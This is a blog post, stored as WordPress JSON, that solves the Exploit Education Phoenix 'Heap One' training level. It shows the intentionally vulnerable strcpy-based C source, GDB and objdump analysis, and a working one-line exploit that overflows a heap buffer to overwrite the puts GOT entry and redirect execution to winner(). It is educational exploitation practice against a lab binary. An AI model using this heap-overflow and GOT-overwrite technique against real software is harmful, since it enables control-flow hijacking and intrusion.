{"id":631,"date":"2019-08-10T18:31:53","date_gmt":"2019-08-10T22:31:53","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=631"},"modified":"2021-05-10T06:18:25","modified_gmt":"2021-05-10T10:18:25","slug":"exploit-education-phoenix-heap-one-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/exploit-education-phoenix-heap-one-solution\/","title":{"rendered":"Exploit Education | Phoenix | Heap One Solution"},"content":{"rendered":"

This level explores what can be done with data overwrites.<\/p>\n

The description and source code can be found here:
\nhttp:\/\/exploit.education\/phoenix\/heap-one\/<\/a><\/p>\n

Fundamentally, this level is not much different than the last one. I’ll be using a buffer overflow exploit. Though this one is a little trickier. We can see what needs to be done just by looking at the source code:<\/p>\n

struct heapStructure {\r\n    int priority;\r\n    char *name;\r\n};\r\n\r\nint main(int argc, char **argv) {\r\n    struct heapStructure *i1, *i2;\r\n\r\n    i1 = malloc(sizeof(struct heapStructure));\r\n    i1-&gt;priority = 1;\r\n    i1-&gt;name = malloc(8);\r\n\r\n    i2 = malloc(sizeof(struct heapStructure));\r\n    i2-&gt;priority = 2;\r\n    i2-&gt;name = malloc(8);\r\n\r\n    strcpy(i1-&gt;name, argv[1]);\r\n    strcpy(i2-&gt;name, argv[2]);\r\n\r\n    printf("and that's a wrap folks!\\n");\r\n}\r\n\r\nvoid winner() {\r\n    printf(\r\n        "Congratulations, you've completed this level @ %ld seconds past the "\r\n        "Epoch\\n",\r\n        time(NULL));\r\n}<\/pre>\n
The program allocates 2 pointers on the stack that will point to a struct being stored on the heap. The first struct gets memory allocated to it via malloc()<\/span>, assigns a number to the priority<\/strong> variable, and allocates another 8 bytes in the heap for the name<\/strong> variable. Then the same thing happens for the second struct. The key here is that the name<\/strong> variable in the struct is a pointer. That’s important because next, the program uses strcpy() <\/span>to copy the first and second program arguments to the name<\/strong> variables for each struct. Since strcpy() <\/span>does no bounds checking, I should be able to overflow the buffer of the first name<\/strong> variable and overwrite the pointer to the second name<\/strong> variable. Now I can use the second  strcpy() <\/span>to write (almost) whatever I want to (almost) wherever I want. The goal here is to execute the winner() <\/span>function. The source code shows one last call to printf() <\/span>functionbefore the program exits. Maybe I can overwrite the GOT entry for that with the address of the winner() <\/span>function.<\/p>\n
Looking at the disassembly, we see a call to puts()<\/span> near the end of main()<\/span>. Sometimes, the compiler optimization will use that instead of printf()<\/span>.<\/p>\n
user@phoenix-amd64:~$ cd \/opt\/phoenix\/i486\r\nuser@phoenix-amd64:\/opt\/phoenix\/i486$ objdump --no-show-raw-insn -Mintel -d heap-one\r\n...\r\n 8048878:       add    esp,0x10\r\n 804887b:       sub    esp,0xc\r\n 804887e:       push   0x804ab70\r\n 8048883:       call   80485b0 &lt;puts@plt&gt;\r\n 8048888:       add    esp,0x10\r\n 804888b:       mov    eax,0x0\r\n 8048890:       lea    esp,[ebp-0x8]\r\n 8048893:       pop    ecx\r\n 8048894:       pop    ebx\r\n 8048895:       pop    ebp\r\n 8048896:       lea    esp,[ecx-0x4]\r\n 8048899:       ret\r\n...<\/pre>\n
I’ll need to run the program in GDB to determine the distance between the start of the name<\/strong> buffer and the pointer to the second name<\/strong> variable. I’ll set a breakpoint after the second call to strcpy() <\/span> so I can search the memory for my input string.<\/p>\n
$ gdb -q heap-one\r\nGEF for linux ready, type `gef' to start, `gef config' to configure\r\n71 commands loaded for GDB 8.2.1 using Python engine 3.5\r\n[*] 2 commands could not be loaded, run `gef missing` to know why.\r\nReading symbols from heap-one...(no debugging symbols found)...done.\r\n\r\ngef\u27a4 disas main\r\nDump of assembler code for function main:\r\n...\r\n   0x08048873 &lt;+158&gt;:   call   0x8048560 &lt;strcpy@plt&gt;\r\n   0x08048878 &lt;+163&gt;:   add    esp,0x10\r\n...\r\n\r\ngef\u27a4 b *main+163\r\nBreakpoint 1 at 0x8048878\r\n\r\ngef\u27a4 run ABACAD AAAA\r\nStarting program: \/opt\/phoenix\/i486\/heap-one ABACAD AAAA\r\n\r\n[... GEF output snipped ...]\r\n\r\ngef\u27a4 search-pattern ABACAD\r\n[+] Searching 'ABACAD' in memory\r\n[+] In (0xf7e69000-0xf7f69000), permission=rwx\r\n  0xf7e69018 - 0xf7e6901e  \u2192   "ABACAD"\r\n[+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx\r\n  0xffffd8dd - 0xffffd8e3  \u2192   "ABACAD"\r\n\r\ngef\u27a4 x\/16wx 0xf7e69000\r\n0xf7e69000:     0x00000000      0x00000011      0x00000001      0xf7e69018\r\n0xf7e69010:     0x00000000      0x00000011      0x43414241      0x00004441\r\n0xf7e69020:     0x00000000      0x00000011      0x00000002      0xf7e69038\r\n0xf7e69030:     0x00000000      0x00000011      0x41414141      0x00000000\r\n\r\ngef\u27a4 p 0xf7e6902c - 0xf7e69018\r\n$1 = 0x14<\/pre>\n
I found the location in the heap I was looking for and saw that the buffer for the first name<\/strong> variable begins at 0xf7e69018 and the pointer to the second name<\/strong> variable begins at 0xf7e6902c, which puts them 20 bytes (0x14) apart. Now I need the pointer to the puts() <\/span>address in the GOT so I can overwrite it as well as the address of the winner() <\/span>function:<\/p>\n
$ objdump --no-show-raw-insn -Mintel -d heap-one\r\n...\r\n080485b0 &lt;puts@plt&gt;:\r\n 80485b0:       jmp    DWORD PTR ds:0x804c140\r\n 80485b6:       push   0x28\r\n 80485bb:       jmp    8048550 &lt;.plt&gt;\r\n...\r\n\r\n$ nm heap-one | grep winner\r\n0804889a T winner<\/pre>\n
Now to put it all together:<\/p>\n
$ .\/heap-one $(python -c 'print "A"*20 + "\\x40\\xc1\\x04\\x08"') $(echo -e "\\x9a\\x88\\x04\\x08")\r\nCongratulations, you've completed this level @ 1565476156 seconds past the Epoch<\/pre>\n","protected":false},"excerpt":{"rendered":"
This level explores what can be done with data overwrites … Continue readingExploit Education | Phoenix | Heap One Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-631","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/631","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=631"}],"version-history":[{"count":16,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/631\/revisions"}],"predecessor-version":[{"id":1545,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/631\/revisions\/1545"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=631"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=631"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=631"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}